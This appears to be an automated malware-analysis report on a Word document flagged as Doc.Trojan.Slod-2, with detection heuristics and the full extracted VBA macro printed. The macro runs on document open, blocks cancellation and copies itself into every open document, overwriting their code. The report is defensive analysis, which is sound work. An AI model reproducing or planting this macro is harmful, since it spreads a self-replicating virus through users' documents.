MALICIOUS
180
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample is a malicious OLE document containing a VBA macro that executes upon opening. The macro attempts to infect other documents by overwriting their content with its own code. The ClamAV detection 'Doc.Trojan.Slod-2' further confirms its malicious nature. No external network activity or specific payload delivery was observed.
Heuristics 3
-
ClamAV: Doc.Trojan.Slod-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Slod-2
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1561 bytes |
SHA-256: 613e72294ae28cd9642fe076f344935f122e9c7a8f3a6760fe9eacc02479a647 |
|||
|
Detection
ClamAV:
Doc.Trojan.Slod-2
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() Application.EnableCancelKey = wdCancelDisabled Options.VirusProtection = Yes Options.ConfirmConversions = Yes A = ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, ThisDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines) For B = 1 To Documents.Count If Documents.Item(B).ReadOnly = True Then SetAttr Documents.Item(B).FullName, vbNormal Documents.Item(B).Reload Documents.Item(B).VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, Documents.Item(B).VBProject.VBComponents.Item(1).CodeModule.CountOfLines Documents.Item(B).VBProject.VBComponents.Item(1).CodeModule.AddFromString A Documents.Item(B).SaveAs FileName:=Documents.Item(B).FullName SetAttr Documents.Item(B).FullName, vbReadOnly Documents.Item(B).Reload Else Documents.Item(B).VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, Documents.Item(B).VBProject.VBComponents.Item(1).CodeModule.CountOfLines Documents.Item(B).VBProject.VBComponents.Item(1).CodeModule.AddFromString A Documents.Item(B).SaveAs FileName:=Documents.Item(B).FullName End If Documents.Item(B).VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, Documents.Item(B).VBProject.VBComponents.Item(1).CodeModule.CountOfLines Documents.Item(B).Saved = True Next End Sub 'Dead Dolls By Lys Kovick |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.